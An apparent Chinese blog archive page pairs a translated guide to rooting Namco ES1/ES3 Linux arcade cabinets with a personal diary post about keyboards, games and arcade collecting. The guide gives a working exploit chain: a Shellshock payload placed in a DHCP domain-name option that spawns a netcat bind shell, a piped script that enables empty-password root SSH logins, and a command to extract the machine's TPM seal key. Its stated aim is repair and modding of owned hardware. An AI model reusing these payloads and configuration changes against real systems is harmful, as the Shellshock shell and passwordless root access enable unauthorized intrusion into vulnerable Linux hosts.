月度归档: 2017 年 1 月

Namco ES1/ES3(Linux) 越狱指南(翻译自 a12s 原帖)

1:06更新:发现一个介绍的更详细的安全越狱方法,各位翻墙看吧:A Medium Link。回头有机会翻译一下这一篇。

这篇文章主要介绍了 Namco 基于 Linux 开发的 ES1/ES3 系列平台的一种越狱方法,这篇文章说的工作非常基础,但是一旦获取权限,就可以进行包括救砖、显卡更换还有硬盘损坏修复等等工作。肌肉男这个家伙虽然有的时候有点怪,但是还是有干货的。
分享给各位。

P.S 笔者手懒, ES1/ES3 设备被我统称为 ESx 设备了,不是VMWare那个虚拟机啊,提前声明~

先题

不要将 ESx 的硬盘直接连接到 Windows 平台的计算机上,否则的话硬盘将变砖。
如果试图提取内容或修改其内容,请尝试使用对拷机制作副本或使用 Linux 平台操作。
如果你已经将硬盘插到 Windows 平台上了,请不要尝试再在 ESx 平台上开机,否则的话它将自杀。
(吐槽: 256 的硬盘也说是这样,原因是使用了 PS2 的 FAT12 文件系统, Windows 系统会尝试将它转换为 FAT16 文件系统,这样的后果就是变砖)

已验证游戏:
-Tank Tank Tank
-Dead Heat
-Dead Heat Riders
-Nirin

所需设备:

- 一台 Linux 设备 ( Windows 也可以,但是 Linux 会明显减轻你的工作量)
- ES1/ES3 Linux 主机一台
- 网线
- 虚拟机或隔离的 Linux 工作环境

步骤:

1)在 Linux 机器上安装 dhcpd ,若你现在的网络环境中有其他 DHCP 服务,比如家用路由器的话,请将之禁用。
2)如此配置 dhcpd ,当然,也可以绑定你的 ESx 设备的 MAC 地址,这样最安全。
option domain-name "() { :;}; /bin/nc -lp23 -c/bin/sh&";
3)将如下代码保存为一个文件(比如 <~/test.sh> ):
sed -i 's/nullok_secure$/nullok/' /etc/pam.d/common-auth
sed -i 's/.*PermitEmptyPasswords.*/PermitEmptyPasswords yes/' /etc/ssh/sshd_config
/etc/init.d/ssh restart

4)把 ESx 的 RJ45(网线口) 和这台 Linux 设备连接起来。
5)启动 ESx 设备,一旦可以 ping 通了,运行这条指令
cat <~/test.sh> | nc -q 23
6)然后就可以通过 SSH 链接到主机上。用户名: root 密码为空。
关于这一利用方法的详情:TrendMicro
(吐槽:妈的以后还是要看英文原版新闻,看国内媒体太浪费时间了)
7) ESx 系统大概在十几秒之后会中断所有网络连接(吐槽:霓虹的好多街机都这样,看向了 SEGAY 的这一堆洋垃圾),所以你得快点拷贝出机器的 TPM ( 吐槽: Trusted Platform Module ,可信计算模块,通过硬件加密为计算机内容器提供数据安全防护。为了这个全拼我还专门开了下百度,看来英文是确实不行了)密钥。
arcadeunsealkey /etc/arcade/sealkey

致谢:
-android 提供了 PCB
-匿名人士发现了这一方法

本文提供的方法首次发现于2015.6.11。

帝都安定日常记(三)

2017年,新年快乐。

首先是升级通告,把现在跑的 Google reCaptcha 替换成了国内的极验验证,速度会好一些。更重要的是,不需要翻墙了。
最后信仰还是没有战胜现实?这句话不止可以用在这件事上吧~
有机会还是要肉身翻墙。

最近的关键字
(一)键盘
当时在图吧淘的技嘉茶轴最终没能活过一年。淘宝买了小丑鱼的 Cherry 红轴扔在公司,手感还不错。键帽惨了点。不过价格摆在那里,有那个功夫换键帽不如想想怎么涨工资。
多说两句,技嘉这个键盘当时是因为某些问题京东下架才被不良商家拿来卖二手回本的。拆开看了下,线走的确实好,质量也过硬,但是板子不干净,而且主控芯片看上去不太好。为什么是看上去不太好呢?因为型号被打磨掉了。
靠键盘吃饭的人,对自己(的手)好一点。
我的3494
这是我的主力 3494 ,打开 WordPress 之前,我刚刚给它做了个清理。回头有机会搞把大 Flico 玩一下吧~

(二)阴阳师
因为什么原因入的坑来着。。想不起来了。前前后后勉强也算是轻度氪金玩家,一千多块。算上必出 SSR 一共 5 个,基本上符合 200 人民币一个 SSR 的价目表。单独列出来是因为这两天阴阳师出了个暴露出他们没有 QA 的事实的 bug 。在行业人员来看这次闹得纷纷扬扬的问题就不应该在线上的生产环境中出现,但是恰好他就出现了。看来中秋节那一波拿的60个月奖金估计就是提前发的年终奖了。
总结说过很多次了,这里重复一下:不是说你的美工和策划( PM )会写脚本了,就不需要 QA 和研发了。
另外一个阴阳师相关是元旦去了一趟 IDO20 。帝都的一个很普通的漫展。不过姑获鸟皮肤是在后面几天把欧皇神机大佬送去睡觉之后才出的。
会上弄到了一个水君扭蛋,一发入魂。挂到 3DS 上了。果然还是得回到 Pokemon 的坑里。
顺带一提,这扭蛋已经出厂 5 年了。莫名其妙想起了台北的扭蛋。是不是又该去一趟了?
或者,要不直接计划去 11 区一趟好了~
水君

(三) 精灵宝可梦相关
最近北京的 7-11 便利店和大陆的精灵宝可梦运营公司做了好多联名活动啊。近水楼台,顺手拿到了限定版的浴巾和其他周边。
然后终于把宝可梦·太阳的一周目过完了。有点肝不动了,但是看到片尾的 GF 还是觉得有点很感动呢。
宝可梦日一周目
说到精灵宝可梦,那就不得不提一下这篇文章说到的事情了。目前的进度:
·代码清理 Done
·代码修复 10%
--PokeDex Done
·其他 0%
哈哈,事有点多,慢慢来吧。

(四)街机收藏。
工作第一年我的绝大部分收入都贡献给了街机收藏。虽然有 maimai 私活作为补充但是还是捉襟见肘。 maimai Orange 泄露之后(大概今年下半年),我就绝少再涉足这块的收藏了。但是已有的收藏还是要慢慢补齐的,尤其是 Namco System 256 平台的太鼓达人系列。
元旦的时候没有按捺住洪荒之力,用了一个破天花板的价格买了日拍上少见的太鼓达人 9 街机版。这样的话,光盘版就差很早之前出掉的太鼓达人 11 日版,就收集齐了。
怎么能没有图呢!
颈椎病专治

最近其他的事情,都还算是没有结果的事情,以后有机会再聊吧。